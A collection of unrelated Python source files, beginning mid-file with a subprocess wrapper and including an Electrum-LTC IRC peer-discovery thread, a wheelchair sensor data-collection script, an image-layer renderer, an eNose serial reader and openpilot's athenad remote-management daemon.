for t in [ self.thread_out, self.thread_err ]:
t.daemon = True
t.start()
self.__outputs = []
self.__errors = []
def do(self, query):
# Reads whatever remains in stdout/stderr
self.__read_all()
self.process.stdin.write(query + ';\n')
return self
def last_output(self):
self.__read_output()
return self.__outputs[-1]
def last_error(self):
self.__read_errors()
return self.__errors[-1]
def outputs(self):
self.__read_output()
return self.__outputs
def errors(self):
self.__read_errors()
return self.__errors
def has_errors(self):
self.__read_errors()
for err in self.__errors:
if 'WARNING' not in err and err != '':
return True
return False
def close(self):
self.process.stdin.write('quit;\n')
self.process.wait()
def __read_all(self):
self.__read_output()
self.__read_errors()
def __read_output(self):
r = self.__read(self.stdout)
if r:
self.__outputs.append(r)
def __read_errors(self):
r = self.__read(self.stderr)
if r:
self.__errors.append(r)
def __read(self, queue):
output = None
while True:
try:
line = queue.get(timeout=.2)
except Empty:
return output
else:
output = line if output is None else output + line
def __enqueue_output(self, out, queue):
for line in iter(out.readline, ''):
queue.put(line)
out.close()
|
ircthread.py
|
#!/usr/bin/env python
# Copyright(C) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import time
import socket
import ssl
import threading
import Queue
import irc.client
from utils import logger
from utils import Hash
from version import VERSION
out_msg = []
class IrcThread(threading.Thread):
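    # Advertises this server on the #electrum-ltc IRC channel (nick "EL_" + a host-derived hash,
    # realname encoding host, version, pruning limit and ports) and discovers peer servers from
    # JOIN/WHO replies, forwarding ('join', ...) and ('quit', ...) events to the processor queue.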
def __init__(self, processor, config):
threading.Thread.__init__(self)
self.processor = processor
self.daemon = True
options = dict(config.items('server'))
self.stratum_tcp_port = options.get('stratum_tcp_port')
self.stratum_tcp_ssl_port = options.get('stratum_tcp_ssl_port')
self.report_stratum_tcp_port = options.get('report_stratum_tcp_port')
self.report_stratum_tcp_ssl_port = options.get('report_stratum_tcp_ssl_port')
self.irc_bind_ip = options.get('irc_bind_ip')
self.host = options.get('host')
self.report_host = options.get('report_host')
self.nick = options.get('irc_nick')
if self.report_stratum_tcp_port:
self.stratum_tcp_port = self.report_stratum_tcp_port
if self.report_stratum_tcp_ssl_port:
self.stratum_tcp_ssl_port = self.report_stratum_tcp_ssl_port
if self.report_host:
self.host = self.report_host
if not self.nick:
self.nick = Hash(self.host)[:5].encode("hex")
self.pruning = True
self.pruning_limit = config.get('leveldb', 'pruning_limit')
self.nick = 'EL_' + self.nick
self.password = None
self.who_queue = Queue.Queue()
def getname(self):
s = 'v' + VERSION + ' '
if self.pruning:
s += 'p' + self.pruning_limit + ' '
def add_port(letter, number):
DEFAULT_PORTS = {'t':'50001', 's':'50002'}
if not number: return ''
if DEFAULT_PORTS[letter] == number:
return letter + ' '
else:
return letter + number + ' '
s += add_port('t',self.stratum_tcp_port)
s += add_port('s',self.stratum_tcp_ssl_port)
return s
def start(self, queue):
self.queue = queue
threading.Thread.start(self)
def on_connect(self, connection, event):
connection.join("#electrum-ltc")
def on_join(self, connection, event):
m = re.match("(EL_.*)!", event.source)
if m:
self.who_queue.put((connection, m.group(1)))
def on_quit(self, connection, event):
m = re.match("(EL_.*)!", event.source)
if m:
self.queue.put(('quit', [m.group(1)]))
def on_kick(self, connection, event):
m = re.match("(EL_.*)", event.arguments[0])
if m:
self.queue.put(('quit', [m.group(1)]))
def on_disconnect(self, connection, event):
logger.error("irc: disconnected")
raise BaseException("disconnected")
def on_who(self, connection, event):
line = str(event.arguments[6]).split()
try:
ip = socket.gethostbyname(line[1])
except:
# no IPv4 address could be resolved. Could be .onion or IPv6.
ip = line[1]
nick = event.arguments[4]
host = line[1]
ports = line[2:]
self.queue.put(('join', [nick, ip, host, ports]))
def on_name(self, connection, event):
for s in event.arguments[2].split():
if s.startswith("EL_"):
self.who_queue.put((connection, s))
def who_thread(self):
while not self.processor.shared.stopped():
try:
connection, s = self.who_queue.get(timeout=1)
except Queue.Empty:
continue
#logger.info("who: "+ s)
connection.who(s)
time.sleep(1)
def run(self):
while self.processor.shared.paused():
time.sleep(1)
self.ircname = self.host + ' ' + self.getname()
# avoid UnicodeDecodeError using LenientDecodingLineBuffer
irc.client.ServerConnection.buffer_class = irc.buffer.LenientDecodingLineBuffer
logger.info("joining IRC")
t = threading.Thread(target=self.who_thread)
t.start()
while not self.processor.shared.stopped():
client = irc.client.Reactor()
try:
#bind_address = (self.irc_bind_ip, 0) if self.irc_bind_ip else None
#ssl_factory = irc.connection.Factory(wrapper=ssl.wrap_socket, bind_address=bind_address)
#c = client.server().connect('irc.freenode.net', 6697, self.nick, self.password, ircname=self.ircname, connect_factory=ssl_factory)
c = client.server().connect('irc.freenode.net', 6667, self.nick, self.password, ircname=self.ircname)
except irc.client.ServerConnectionError:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
c.add_global_handler("welcome", self.on_connect)
c.add_global_handler("join", self.on_join)
c.add_global_handler("quit", self.on_quit)
c.add_global_handler("kick", self.on_kick)
c.add_global_handler("whoreply", self.on_who)
c.add_global_handler("namreply", self.on_name)
c.add_global_handler("disconnect", self.on_disconnect)
c.set_keepalive(60)
self.connection = c
try:
client.process_forever()
except BaseException as e:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
logger.info("quitting IRC")
|
Collect_and_labelV1.1.0.py
|
import pygatt # To access BLE GATT support
import signal # To catch the Ctrl+C and end the program properly
import os # To access environment variables
from dotenv import load_dotenv # To load the environment variables from the .env file
from random import random
import serial  # pySerial; required by open_serial() and the serial writes below
import time
from threading import Thread
import pexpect
import sys
from dcd.entities.thing import Thing # DCD Hub
from dcd.entities.property_type import PropertyType
load_dotenv() # The thing ID and access token
THING_ID = os.environ['THING_ID']
THING_TOKEN = os.environ['THING_TOKEN']
CLASSES = ["Passing", "Adjustment", "Fakeout", "Throw", "Sprint"] # Movement classes
LABEL_PROP_NAME = "Movement"
PROPERTY_HRM_NAME = "My heart rate measurement 1"
PROPERTY_ORIENTATION_NAME = "Right Sports Wheel Arbeid"
PROPERTY_WHEELCHAIR_NAME = "Chair base"
MAX_SAMPLES = 100 # How many samples do we want for each class
DELAY_BETWEEN_MOVEMENT = 15 # How much time (in seconds) to leave between the collection of each class
BLUETOOTH_DEVICE_MAC_WHEEL = os.environ['BLUETOOTH_DEVICE_MAC_WHEEL']
GATT_CHARACTERISTIC_ORIENTATION = "02118833-4455-6677-8899-AABBCCDDEEFF" # UUID of the GATT characteristic to subscribe
ADDRESS_TYPE = pygatt.BLEAddressType.random # Many devices, e.g. Fitbit, use random addressing, this is required to connect.
# Instantiate a thing with its credential
my_thing = Thing(thing_id=THING_ID, token=THING_TOKEN)
# Read the details of our Thing from the DCD Hub to get property details
my_thing.read()
# Find label and data property by name
prop_label = my_thing.find_or_create(LABEL_PROP_NAME, PropertyType.CLASS)
prop_orientation = my_thing.find_or_create(PROPERTY_ORIENTATION_NAME, PropertyType.THREE_DIMENSIONS)
prop_hrm = my_thing.find_or_create(PROPERTY_HRM_NAME, PropertyType.ONE)
prop_wheelchair = my_thing.find_or_create(PROPERTY_WHEELCHAIR_NAME, PropertyType.THREE_DIMENSIONS)
# OPEN Serial
def open_serial(): # Open a serial connection
# Start reading the serial port
return serial.Serial(
port=os.environ['SERIAL'],
baudrate=9600,
timeout=2)
# BLE
def handle_orientation_data(handle, value_bytes): # print wheel values, send to server
"""
handle -- integer, characteristic read handle the data was received on
value_bytes -- bytearray, the data returned in the notification
"""
print("Received data: %s (handle %d)" % (str(value_bytes), handle))
values = [float(x) for x in value_bytes.decode('utf-8').split(",")]
prop_orientation.update_values(values)
def discover_characteristic(device): # Provide UUID
"""List characteristics of a device"""
for uuid in device.discover_characteristics().keys():
try:
print("Read UUID" + str(uuid) + " " + str(device.char_read(uuid)))
except:
print("Something wrong with " + str(uuid))
def read_characteristic(device, characteristic_id): # return BLE characteristic
"""Read a characteristic"""
return device.char_read(characteristic_id)
def keyboard_interrupt_handler(signal_num, frame): #Provide interrupt
"""Make sure we close our program properly"""
print("Exiting...".format(signal_num))
left_wheel.unsubscribe(GATT_CHARACTERISTIC_ORIENTATION)
ser.close()
child.sendline("char-write-req 0x000f 0000")
exit(0)
# HRM
def hexStrToInt(hexstr):
val = int(hexstr[3:5], 16) #
if ((val & 0x8000) == 0x8000): # treat signed 16bits
val = -((val ^ 0xffff) + 1)
val = int(val)
return val
# LABEL
def collect(class_index): #Collect data
# if we covered all classes, stop the program
if class_index >= len(CLASSES):
print("Data collection done.")
exit()
# Prompt the user to get ready and wait
print("Get ready to collect the MOVEMENT: " + CLASSES[class_index]
+ " in " + str(DELAY_BETWEEN_MOVEMENT) + " seconds!")
time.sleep(DELAY_BETWEEN_MOVEMENT)
# Open the serial connection
print("Collecting data for MOVEMENT " + CLASSES[class_index])
ser = open_serial()
# Start reading serial port with the MOVEMENT index, start at sample 0.
sample = 0
while sample < MAX_SAMPLES:
if serial_to_property_values(class_index, ser):
sample += 1
print()
ser.close()
collect(class_index + 1)
def serial_to_property_values(class_index, ser): #Add label to data
# Read one line
line_bytes = ser.readline()
# If the line is not empty
if len(line_bytes) > 0:
# Convert the bytes into string
line = line_bytes.decode('utf-8')
# Split the string using commas as separator, we get a list of strings
str_values = line.split(',')
# Remove the first id
# str_values.pop(0)
# Transform the array of string values into float values (numbers)
values = [float(x) for x in str_values]
# get the current time in milliseconds
current_ts_ms = int(round(time.time() * 1000))
# Update values of data and label properties (send them to the DCD Hub)
# With the same timestamp, so we can easily connect label and raw data later
prop_label.update_values([class_index], current_ts_ms)
prop_wheelchair.update_values(values, current_ts_ms)
return True
return False
bleAdapter = pygatt.GATTToolBackend() # Start a BLE adapter
bleAdapter.start()
left_wheel = bleAdapter.connect(BLUETOOTH_DEVICE_MAC_WHEEL, address_type=ADDRESS_TYPE) # Use the BLE adapter to connect to our device
signal.signal(signal.SIGINT, keyboard_interrupt_handler) # Register our Keyboard handler to exit
#end BLE code
#start of Heartratemonitor CODE
#put your hrm mac address here
hrmMacAddress = "C5:46:4C:2F:AD:C6"
# Show the property
#print(my_property.to_json())
# Spawn a child process with gatttool to control your BLE device.
#Your hrm uses random addressing like most BLE devices.
#gatttool is the application within debian (your rpi operating system) used
#to communicate with BLE devices. The other single-letter arguments are flags
#that you do not need to know about.
child = pexpect.spawn("sudo gatttool -t random -b {0} -I".format(hrmMacAddress) )
#Connect to hrm
print("Searching for HRM")
print("Connecting...")
# The number of times you want to retry connecting before you give up
RETRY_CONNECTION = 2
while True:
try:
child.sendline("connect")
child.expect("Connection successful", timeout=5)
except pexpect.TIMEOUT:
RETRY_CONNECTION = RETRY_CONNECTION - 1
if (RETRY_CONNECTION > 0):
print("timeout, trying again")
continue
else:
print("timeout, giving up.")
break
else:
print("Connected!")
break
#enable notification. 0x000f is found experimentally. You do not need to know this bit
#unless you are curious. 0100 is to switch on notifications for the particular characteristic.
child.sendline("char-write-req 0x000f 0100")
#end of hrm code
# START COLLECTING
# Start collecting data for the first class
collect(0)
# END OF COLLECTING
def start_gatt():
# Subscribe to the GATT service of the wheel
left_wheel.subscribe(GATT_CHARACTERISTIC_ORIENTATION,
callback=handle_orientation_data)
def start_serial():
while True:
serial_to_property_values()
def start_HRM():
while True:
try:
child.expect("Notification handle = 0x000e value: ", timeout=5)
child.expect("\r\n", timeout=5)
print(child.before)
intvalue = hexStrToInt(child.before)
intvalue_brackets = [intvalue]
#print statement to check the hrm reading
print(intvalue)
            #update new readings to grafana
prop_hrm.update_values(intvalue_brackets)
ser.write(str(intvalue).encode())
ser.write(",".encode()) # this one gave no errors
# ser.write(','.encode())
print("HRM sent to arduino")
except KeyboardInterrupt:
print("Exiting...")
# Unsubscribe from characteristic before exiting program
child.sendline("char-write-req 0x000f 0000")
exit(0)
thread_gatt = Thread(target=start_gatt)
thread_gatt.start()
thread_serial = Thread(target=start_serial)
thread_serial.start()
thread_HRM = Thread(target=start_HRM)
thread_HRM.start()
#End of threading
|
async.py
|
from modules import renderer, Path
#from utils import alphaBlend
import time
import numpy as np
from multiprocessing import Queue, Process
import cv2
import os
'''def alphaBlend(top, bottom):
# takes an HSLA top and a bottom, blends and returns a HSL image
#assert top.shape[0] == 4, "top must have alpha channel"
#assert top.shape[1] == bottom.shape[1], "top and bottom must have equal shape"
#assert top.shape[2] == bottom.shape[2], "top and bottom must have equal shape"
foreground = top[0:3].astype(float)
background = bottom.astype(float)
s = time.time()
alpha = np.stack((top[3].astype(float), top[3].astype(float), top[3].astype(float))) /255
print("time cost of stacking", time.time() - s)
foreground = cv2.multiply(alpha, foreground)
background = cv2.multiply(1.0 - alpha, background)
return cv2.add(foreground, background)'''
def alphaBlend(top, bottom):
'''
takes an HSLA top and a bottom, blends and returns a HSL image
'''
#assert top.shape[0] == 4, "top must have alpha channel"
#assert top.shape[1] == bottom.shape[1], "top and bottom must have equal shape"
#assert top.shape[2] == bottom.shape[2], "top and bottom must have equal shape"
s = time.time()
a = np.divide(top[3].astype(float), 255)
b = np.subtract(1, a)
final = np.add(np.multiply(top[0:3], a), np.multiply(bottom, b)).astype(np.uint8)
print("time cost of stacking", time.time() - s)
return final
if __name__ == '__main__':
res = [1000, 1000]
master_dict = {} # {pathID:[path object, render process, input q, output q]}
BG = np.vstack([[np.ones(res)*179], [np.ones(res)*10], [np.ones(res)*100]])
rendering_sequence = range(17) #change layer order here
in_q = Queue()
out_q = Queue()
for i in range(8):
process = Process(target=renderer, args=(in_q, out_q))
process.start()
for i in range(17):
master_dict[i] = Path(map_resolution=res)
print("PathManager initialization complete.")
#===============================================================================================================================
    #start a queue and spawn the rcnn inference process
from model import getPointsAsync
point_list_queue = Queue()
inference_process = Process(target=getPointsAsync, args=(point_list_queue,))
inference_process.start()
#===============================================================================================================================
t_start = 0 # time for fps
print("starting main loop")
counter = 0
while True:
ovall_start = time.time()
fps = int(1 / (time.time() - t_start))
t_start = time.time()
img, point_list = point_list_queue.get()
#===============================================================================================================================
for pt in point_list:
master_dict[int(pt[0])].addPoint([int(pt[1]), int(pt[2])])
# loop through all 17 items to: get render parameters from Path and put into inp q
for i, path in enumerate(master_dict.values()):
render_data = path.renderData()
in_q.put([i, render_data])
        # perform alpha blending of the layers according to the rendering sequence
rendered_layers = list(range(17)) # will be in the numerical indexing order
# retrieve rendered layers from out q and put into rendered_layers for blending
for _ in range(len(master_dict)):
rendered_layer = out_q.get()
rendered_layers[rendered_layer[0]] = rendered_layer[1]
bottom_layer = np.transpose(cv2.cvtColor(img, cv2.COLOR_RGB2HSV), [2, 1, 0])
for i in rendering_sequence:
bottom_layer = alphaBlend(rendered_layers[i], bottom_layer)
bottom_layer = np.transpose(bottom_layer, [2, 1, 0])
bottom_layer = bottom_layer.astype(np.uint8)
rendered_img = cv2.cvtColor(bottom_layer, cv2.COLOR_HSV2RGB)
print("image blending complete")
cv2.imwrite(os.path.join(r"I:\TRS Project 2\async_video_out", str(counter)+".jpg"), rendered_img)
counter += 1
#===============================================================================================================================
|
eNoseConnector.py
|
import re
from threading import Thread
from .EventHook import EventHook
from threading import Lock
import serial
import serial.tools.list_ports
import sys
class eNoseConnector:
""" Connects to an eNose on the given port with the given baudrate.
Parses the input in a new thread and updates its values accordingly.
After each full received frame, the onUpdate is triggered.
Use onUpdate like this: connector.onUpdate += <callbackMethod>"""
def __init__(self, port: str = None, baudrate: int = 115200, channels: int = 64):
self.onUpdate: EventHook = EventHook()
self.finished = False
self.sensorValues = [0.0] * channels
self.channels = channels
# self._readerThread = Thread(target=self._readLoop, daemon=True)
# self._readerThreadRun = False
# port = '/dev/ttyUSB0'
if port is None:
port = self.find_port()
self.ser = serial.Serial(
port=port,
baudrate=baudrate,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=10)
# self._readerThreadRun = True
# self._readerThread.start()
print("Reading data started")
def __del__(self):
print('Closing...')
self.finished = True
# if self._readerThreadRun:
# self._readerThreadRun = False
# self._readerThread.join()
try:
self.ser.close()
except Exception:
pass
def readLoop(self):
print('Read Loop started')
while not self.finished:
try:
line = self.ser.readline()
# line looks like: count=___,var1=____._,var2=____._,....
match = re.match(b'^count=([0-9]+),(var.+)$', line)
if match is not None:
self.channels = int(match.group(1))
sensors_data = match.group(2)
self.sensorValues = [float(d.split(b'=')[1]) for d in sensors_data.split(b',')]
print("received data for %i sensors (actually %i)" % (self.channels, len(self.sensorValues)))
self.onUpdate()
else:
print('line: ', line)
except KeyboardInterrupt:
print('Interrupted, closing...')
self.finished = True
            except Exception as exc:
                print('Exception raised while reading:', exc)
print('Read Loop finished')
@staticmethod
def find_port():
""" Searches all serial ports for a connected eNose and returns the port if found, None otherwise"""
ports = list(serial.tools.list_ports.comports())
port = None
for p in ports:
print('Checking port %s / %s' % (p[0], p[1]))
if "CP2102" in p[1]:
port = p
break
if port is None:
print('Could not find a connected eNose')
return None
print('Using the eNose connected on:')
print(port[0] + ' / ' + port[1])
return port[0]
if __name__ == '__main__':
    connector = eNoseConnector()
    def onUpdate():
        print('sensor values: ', connector.sensorValues)
    connector.onUpdate += onUpdate
    # register the callback before readLoop(), which blocks until interrupted
    connector.readLoop()
|
athenad.py
|
#!/usr/bin/env python3
import base64
import hashlib
import io
import json
import os
import queue
import random
import select
import socket
import subprocess
import sys
import tempfile
import threading
import time
from collections import namedtuple
from datetime import datetime
from functools import partial
from typing import Any, Dict
import requests
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import (ABNF, WebSocketException, WebSocketTimeoutException,
create_connection)
import cereal.messaging as messaging
from cereal import log
from cereal.services import service_list
from common.api import Api
from common.basedir import PERSIST
from common.file_helpers import CallbackReader
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE, PC, TICI
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.statsd import STATS_DIR
from selfdrive.swaglog import SWAGLOG_DIR, cloudlog
from selfdrive.version import get_commit, get_origin, get_short_branch, get_version
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://athena.comma.ai')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = {8022}
LOG_ATTR_NAME = 'user.upload'
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
RECONNECT_TIMEOUT_S = 70
RETRY_DELAY = 10 # seconds
MAX_RETRY_COUNT = 30 # Try for at most 5 minutes if upload fails immediately
MAX_AGE = 31 * 24 * 3600 # seconds
WS_FRAME_SIZE = 4096
NetworkType = log.DeviceState.NetworkType
dispatcher["echo"] = lambda s: s
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
low_priority_send_queue: Any = queue.Queue()
log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id', 'retry_count', 'current', 'progress', 'allow_cellular'], defaults=(0, False, 0, False))
cur_upload_items: Dict[int, Any] = {}
class AbortTransferException(Exception):
pass
class UploadQueueCache():
params = Params()
@staticmethod
def initialize(upload_queue):
try:
upload_queue_json = UploadQueueCache.params.get("AthenadUploadQueue")
if upload_queue_json is not None:
for item in json.loads(upload_queue_json):
upload_queue.put(UploadItem(**item))
except Exception:
cloudlog.exception("athena.UploadQueueCache.initialize.exception")
@staticmethod
def cache(upload_queue):
try:
items = [i._asdict() for i in upload_queue.queue if i.id not in cancelled_uploads]
UploadQueueCache.params.put("AthenadUploadQueue", json.dumps(items))
except Exception:
cloudlog.exception("athena.UploadQueueCache.cache.exception")
def handle_long_poll(ws):
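  # Spawn the recv/send/upload/log/stat worker threads for this websocket connection and block
  # until one of them sets end_event, then join them all.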
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event), name='ws_recv'),
threading.Thread(target=ws_send, args=(ws, end_event), name='ws_send'),
threading.Thread(target=upload_handler, args=(end_event,), name='upload_handler'),
threading.Thread(target=log_handler, args=(end_event,), name='log_handler'),
threading.Thread(target=stat_handler, args=(end_event,), name='stat_handler'),
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,), name=f'worker_{x}')
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for thread in threads:
cloudlog.debug(f"athena.joining {thread.name}")
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = recv_queue.get(timeout=1)
if "method" in data:
cloudlog.debug(f"athena.jsonrpc_handler.call_method {data}")
response = JSONRPCResponseManager.handle(data, dispatcher)
send_queue.put_nowait(response.json)
elif "id" in data and ("result" in data or "error" in data):
log_recv_queue.put_nowait(data)
else:
raise Exception("not a valid request or response")
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
send_queue.put_nowait(json.dumps({"error": str(e)}))
def retry_upload(tid: int, end_event: threading.Event, increase_count: bool = True) -> None:
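  # Re-queue the current upload (optionally bumping its retry count; items past MAX_RETRY_COUNT
  # are dropped), then wait RETRY_DELAY seconds, checking end_event every second.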
if cur_upload_items[tid].retry_count < MAX_RETRY_COUNT:
item = cur_upload_items[tid]
new_retry_count = item.retry_count + 1 if increase_count else item.retry_count
item = item._replace(
retry_count=new_retry_count,
progress=0,
current=False
)
upload_queue.put_nowait(item)
UploadQueueCache.cache(upload_queue)
cur_upload_items[tid] = None
for _ in range(RETRY_DELAY):
time.sleep(1)
if end_event.is_set():
break
def upload_handler(end_event: threading.Event) -> None:
sm = messaging.SubMaster(['deviceState'])
tid = threading.get_ident()
while not end_event.is_set():
cur_upload_items[tid] = None
try:
cur_upload_items[tid] = upload_queue.get(timeout=1)._replace(current=True)
if cur_upload_items[tid].id in cancelled_uploads:
cancelled_uploads.remove(cur_upload_items[tid].id)
continue
# Remove item if too old
age = datetime.now() - datetime.fromtimestamp(cur_upload_items[tid].created_at / 1000)
if age.total_seconds() > MAX_AGE:
cloudlog.event("athena.upload_handler.expired", item=cur_upload_items[tid], error=True)
continue
# Check if uploading over cell is allowed
sm.update(0)
cell = sm['deviceState'].networkType not in [NetworkType.wifi, NetworkType.ethernet]
if cell and (not cur_upload_items[tid].allow_cellular):
retry_upload(tid, end_event, False)
continue
try:
def cb(sz, cur):
# Abort transfer if connection changed to cell after starting upload
sm.update(0)
cell = sm['deviceState'].networkType not in [NetworkType.wifi, NetworkType.ethernet]
if cell and (not cur_upload_items[tid].allow_cellular):
raise AbortTransferException
cur_upload_items[tid] = cur_upload_items[tid]._replace(progress=cur / sz if sz else 1)
network_type = sm['deviceState'].networkType.raw
fn = cur_upload_items[tid].path
try:
sz = os.path.getsize(fn)
except OSError:
sz = -1
cloudlog.event("athena.upload_handler.upload_start", fn=fn, sz=sz, network_type=network_type)
response = _do_upload(cur_upload_items[tid], cb)
if response.status_code not in (200, 201, 403, 412):
cloudlog.event("athena.upload_handler.retry", status_code=response.status_code, fn=fn, sz=sz, network_type=network_type)
retry_upload(tid, end_event)
else:
cloudlog.event("athena.upload_handler.success", fn=fn, sz=sz, network_type=network_type)
UploadQueueCache.cache(upload_queue)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError, requests.exceptions.SSLError):
cloudlog.event("athena.upload_handler.timeout", fn=fn, sz=sz, network_type=network_type)
retry_upload(tid, end_event)
except AbortTransferException:
cloudlog.event("athena.upload_handler.abort", fn=fn, sz=sz, network_type=network_type)
retry_upload(tid, end_event, False)
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item, callback=None):
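  # Stream the file to its presigned URL with an HTTP PUT, wrapping the file object in a
  # CallbackReader when a progress callback is supplied, and setting Content-Length explicitly.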
with open(upload_item.path, "rb") as f:
size = os.fstat(f.fileno()).st_size
if callback:
f = CallbackReader(f, callback, size)
return requests.put(upload_item.url,
data=f,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=30)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def getVersion():
return {
"version": get_version(),
"remote": get_origin(),
"branch": get_short_branch(),
"commit": get_commit(),
}
@dispatcher.add_method
def setNavDestination(latitude=0, longitude=0, place_name=None, place_details=None):
destination = {
"latitude": latitude,
"longitude": longitude,
"place_name": place_name,
"place_details": place_details,
}
Params().put("NavDestination", json.dumps(destination))
return {"success": 1}
def scan_dir(path, prefix):
files = list()
# only walk directories that match the prefix
# (glob and friends traverse entire dir tree)
with os.scandir(path) as i:
for e in i:
rel_path = os.path.relpath(e.path, ROOT)
if e.is_dir(follow_symlinks=False):
# add trailing slash
rel_path = os.path.join(rel_path, '')
# if prefix is a partial dir name, current dir will start with prefix
# if prefix is a partial file name, prefix with start with dir name
if rel_path.startswith(prefix) or prefix.startswith(rel_path):
files.extend(scan_dir(e.path, prefix))
else:
if rel_path.startswith(prefix):
files.append(rel_path)
return files
@dispatcher.add_method
def listDataDirectory(prefix=''):
return scan_dir(ROOT, prefix)
@dispatcher.add_method
def reboot():
sock = messaging.sub_sock("deviceState", timeout=1000)
ret = messaging.recv_one(sock)
if ret is None or ret.deviceState.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
HARDWARE.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
return uploadFilesToUrls([{
"fn": fn,
"url": url,
"headers": headers,
}])
@dispatcher.add_method
def uploadFilesToUrls(files_data):
items = []
failed = []
for file in files_data:
fn = file.get('fn', '')
if len(fn) == 0 or fn[0] == '/' or '..' in fn or 'url' not in file:
failed.append(fn)
continue
path = os.path.join(ROOT, fn)
if not os.path.exists(path):
failed.append(fn)
continue
item = UploadItem(
path=path,
url=file['url'],
headers=file.get('headers', {}),
created_at=int(time.time() * 1000),
id=None,
allow_cellular=file.get('allow_cellular', False),
)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
items.append(item._asdict())
UploadQueueCache.cache(upload_queue)
resp = {"enqueued": len(items), "items": items}
if failed:
resp["failed"] = failed
return resp
@dispatcher.add_method
def listUploadQueue():
items = list(upload_queue.queue) + list(cur_upload_items.values())
return [i._asdict() for i in items if (i is not None) and (i.id not in cancelled_uploads)]
@dispatcher.add_method
def cancelUpload(upload_id):
if not isinstance(upload_id, list):
upload_id = [upload_id]
uploading_ids = {item.id for item in list(upload_queue.queue)}
cancelled_ids = uploading_ids.intersection(upload_id)
if len(cancelled_ids) == 0:
return 404
cancelled_uploads.update(cancelled_ids)
return {"success": 1}
@dispatcher.add_method
def primeActivated(activated):
return {"success": 1}
@dispatcher.add_method
def setBandwithLimit(upload_speed_kbps, download_speed_kbps):
if not TICI:
return {"success": 0, "error": "only supported on comma three"}
try:
HARDWARE.set_bandwidth_limit(upload_speed_kbps, download_speed_kbps)
return {"success": 1}
except subprocess.CalledProcessError as e:
return {"success": 0, "error": "failed to set limit", "stdout": e.stdout, "stderr": e.stderr}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
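  # Bridge a remote websocket (authenticated with the device JWT) to a whitelisted local TCP
  # port -- in practice SSH on port 8022 -- using a pair of proxy threads joined by a socketpair.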
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
cloudlog.debug("athena.startLocalProxy.starting")
dongle_id = Params().get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(0)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
cloudlog.debug("athena.startLocalProxy.started")
return {"success": 1}
except Exception as e:
cloudlog.exception("athenad.startLocalProxy.exception")
raise e
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile(PERSIST + '/comma/id_rsa.pub'):
return None
with open(PERSIST + '/comma/id_rsa.pub') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
return HARDWARE.get_network_type()
